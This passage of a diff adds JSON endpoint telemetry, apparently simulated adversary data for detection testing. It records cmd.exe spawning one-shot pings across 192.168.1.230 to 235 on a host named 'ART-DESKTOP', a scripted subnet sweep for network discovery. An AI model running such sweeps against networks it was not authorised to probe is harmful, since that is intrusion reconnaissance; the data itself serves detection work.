"{42FC7E13-CBBF-5C05-0000-0010E6CB5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573112140000, + "unique_pid": "{42FC7E13-CBBF-5C05-0000-0010E6CB5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573112140000, + "unique_pid": "{42FC7E13-CBBF-5C05-0000-0010E6CB5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573112140000, + "unique_pid": "{42FC7E13-CBBF-5C05-0000-0010E6CB5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573112140000, + "unique_pid": "{42FC7E13-CBBF-5C05-0000-0010E6CB5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573112140000, + "unique_pid": "{42FC7E13-CBBF-5C05-0000-0010E6CB5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573112140000, + "unique_pid": "{42FC7E13-CBBF-5C05-0000-0010E6CB5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573112140000, + "unique_pid": "{42FC7E13-CBBF-5C05-0000-0010E6CB5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573112140000, + "unique_pid": "{42FC7E13-CBBF-5C05-0000-0010E6CB5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573112140000, + "unique_pid": "{42FC7E13-CBBF-5C05-0000-0010E6CB5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573112140000, + "unique_pid": "{42FC7E13-CBBF-5C05-0000-0010E6CB5301}" + }, + { + "event_type": "process", + "pid": 6052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573116830000, + "unique_pid": "{42FC7E13-CBBF-5C05-0000-0010E6CB5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.230", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4244, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573116980000, + "unique_pid": "{42FC7E13-CBBF-5C05-0000-001055CE5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573116980000, + "unique_pid": "{42FC7E13-CBBF-5C05-0000-001055CE5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573116980000, + "unique_pid": "{42FC7E13-CBBF-5C05-0000-001055CE5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573116980000, + "unique_pid": "{42FC7E13-CBBF-5C05-0000-001055CE5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573116980000, + "unique_pid": "{42FC7E13-CBBF-5C05-0000-001055CE5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573116980000, + "unique_pid": "{42FC7E13-CBBF-5C05-0000-001055CE5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573116980000, + "unique_pid": "{42FC7E13-CBBF-5C05-0000-001055CE5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573116980000, + "unique_pid": "{42FC7E13-CBBF-5C05-0000-001055CE5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573116980000, + "unique_pid": "{42FC7E13-CBBF-5C05-0000-001055CE5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573116980000, + "unique_pid": "{42FC7E13-CBBF-5C05-0000-001055CE5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573116980000, + "unique_pid": "{42FC7E13-CBBF-5C05-0000-001055CE5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573116980000, + "unique_pid": "{42FC7E13-CBBF-5C05-0000-001055CE5301}" + }, + { + "event_type": "process", + "pid": 4244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573121990000, + "unique_pid": "{42FC7E13-CBBF-5C05-0000-001055CE5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.231", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 560, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573122140000, + "unique_pid": "{42FC7E13-CBC0-5C05-0000-0010D5D05301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 560, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573122140000, + "unique_pid": "{42FC7E13-CBC0-5C05-0000-0010D5D05301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 560, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573122140000, + "unique_pid": "{42FC7E13-CBC0-5C05-0000-0010D5D05301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 560, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573122140000, + "unique_pid": "{42FC7E13-CBC0-5C05-0000-0010D5D05301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 560, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573122140000, + "unique_pid": "{42FC7E13-CBC0-5C05-0000-0010D5D05301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 560, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573122140000, + "unique_pid": "{42FC7E13-CBC0-5C05-0000-0010D5D05301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 560, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573122140000, + "unique_pid": "{42FC7E13-CBC0-5C05-0000-0010D5D05301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 560, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573122140000, + "unique_pid": "{42FC7E13-CBC0-5C05-0000-0010D5D05301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 560, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573122140000, + "unique_pid": "{42FC7E13-CBC0-5C05-0000-0010D5D05301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 560, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573122140000, + "unique_pid": "{42FC7E13-CBC0-5C05-0000-0010D5D05301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 560, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573122140000, + "unique_pid": "{42FC7E13-CBC0-5C05-0000-0010D5D05301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 560, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573122140000, + "unique_pid": "{42FC7E13-CBC0-5C05-0000-0010D5D05301}" + }, + { + "event_type": "process", + "pid": 560, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573126830000, + "unique_pid": "{42FC7E13-CBC0-5C05-0000-0010D5D05301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.232", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7088, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573126980000, + "unique_pid": "{42FC7E13-CBC0-5C05-0000-001048D35301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7088, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573126980000, + "unique_pid": "{42FC7E13-CBC0-5C05-0000-001048D35301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7088, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573126980000, + "unique_pid": "{42FC7E13-CBC0-5C05-0000-001048D35301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7088, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573126980000, + "unique_pid": "{42FC7E13-CBC0-5C05-0000-001048D35301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7088, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573126980000, + "unique_pid": "{42FC7E13-CBC0-5C05-0000-001048D35301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7088, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573126980000, + "unique_pid": "{42FC7E13-CBC0-5C05-0000-001048D35301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7088, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573126980000, + "unique_pid": "{42FC7E13-CBC0-5C05-0000-001048D35301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7088, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573126980000, + "unique_pid": "{42FC7E13-CBC0-5C05-0000-001048D35301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7088, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573126980000, + "unique_pid": "{42FC7E13-CBC0-5C05-0000-001048D35301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7088, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573126980000, + "unique_pid": "{42FC7E13-CBC0-5C05-0000-001048D35301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7088, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573126980000, + "unique_pid": "{42FC7E13-CBC0-5C05-0000-001048D35301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7088, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573126980000, + "unique_pid": "{42FC7E13-CBC0-5C05-0000-001048D35301}" + }, + { + "event_type": "process", + "pid": 7088, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573131990000, + "unique_pid": "{42FC7E13-CBC0-5C05-0000-001048D35301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.233", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5788, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573132140000, + "unique_pid": "{42FC7E13-CBC1-5C05-0000-0010C4D55301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573132140000, + "unique_pid": "{42FC7E13-CBC1-5C05-0000-0010C4D55301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573132140000, + "unique_pid": "{42FC7E13-CBC1-5C05-0000-0010C4D55301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573132140000, + "unique_pid": "{42FC7E13-CBC1-5C05-0000-0010C4D55301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573132140000, + "unique_pid": "{42FC7E13-CBC1-5C05-0000-0010C4D55301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573132140000, + "unique_pid": "{42FC7E13-CBC1-5C05-0000-0010C4D55301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573132140000, + "unique_pid": "{42FC7E13-CBC1-5C05-0000-0010C4D55301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573132140000, + "unique_pid": "{42FC7E13-CBC1-5C05-0000-0010C4D55301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573132140000, + "unique_pid": "{42FC7E13-CBC1-5C05-0000-0010C4D55301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573132140000, + "unique_pid": "{42FC7E13-CBC1-5C05-0000-0010C4D55301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573132140000, + "unique_pid": "{42FC7E13-CBC1-5C05-0000-0010C4D55301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573132140000, + "unique_pid": "{42FC7E13-CBC1-5C05-0000-0010C4D55301}" + }, + { + "event_type": "process", + "pid": 5788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573136840000, + "unique_pid": "{42FC7E13-CBC1-5C05-0000-0010C4D55301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.234", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 360, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573136980000, + "unique_pid": "{42FC7E13-CBC1-5C05-0000-001038D85301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 360, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573136980000, + "unique_pid": "{42FC7E13-CBC1-5C05-0000-001038D85301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 360, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573136980000, + "unique_pid": "{42FC7E13-CBC1-5C05-0000-001038D85301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 360, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573136980000, + "unique_pid": "{42FC7E13-CBC1-5C05-0000-001038D85301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 360, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573136980000, + "unique_pid": "{42FC7E13-CBC1-5C05-0000-001038D85301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 360, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573136980000, + "unique_pid": "{42FC7E13-CBC1-5C05-0000-001038D85301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 360, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573136980000, + "unique_pid": "{42FC7E13-CBC1-5C05-0000-001038D85301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 360, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573136980000, + "unique_pid": "{42FC7E13-CBC1-5C05-0000-001038D85301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 360, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573136980000, + "unique_pid": "{42FC7E13-CBC1-5C05-0000-001038D85301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 360, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573136980000, + "unique_pid": "{42FC7E13-CBC1-5C05-0000-001038D85301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 360, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573136980000, + "unique_pid": "{42FC7E13-CBC1-5C05-0000-001038D85301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 360, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573136980000, + "unique_pid": "{42FC7E13-CBC1-5C05-0000-001038D85301}" + }, + { + "event_type": "process", + "pid": 360, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573141990000, + "unique_pid": "{42FC7E13-CBC1-5C05-0000-001038D85301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.235", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3824, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573142200000, + "unique_pid": "{42FC7E13-CBC2-5C05-0000-0010B4DA5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3824, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573142140000, + "unique_pid": "{42FC7E13-CBC2-5C05-0000-0010B4DA5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3824, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573142140000, + "unique_pid": "{42FC7E13-CBC2-5C05-0000-0010B4DA5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3824, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573142140000, + "unique_pid": "{42FC7E13-CBC2-5C05-0000-0010B4DA5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3824, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573142140000, + "unique_pid": "{42FC7E13-CBC2-5C05-0000-0010B4DA5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3824, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573142140000, + "unique_pid": "{42FC7E13-CBC2-5C05-0000-0010B4DA5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3824, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573142140000, + "unique_pid": "{42FC7E13-CBC2-5C05-0000-0010B4DA5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3824, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573142140000, + "unique_pid": "{42FC7E13-CBC2-5C05-0000-0010B4DA5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3824, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573142140000, + "unique_pid": "{42FC7E13-CBC2-5C05-0000-0010B4DA5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3824, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573142140000, + "unique_pid": "{42FC7E13-CBC2-5C05-0000-0010B4DA5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3824, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573142140000, + "unique_pid": "{42FC7E13-CBC2-5C05-0000-0010B4DA5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3824, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573142300000, + "unique_pid": "{42FC7E13-CBC2-5C05-0000-0010B4DA5301}" + }, + { + "event_type": 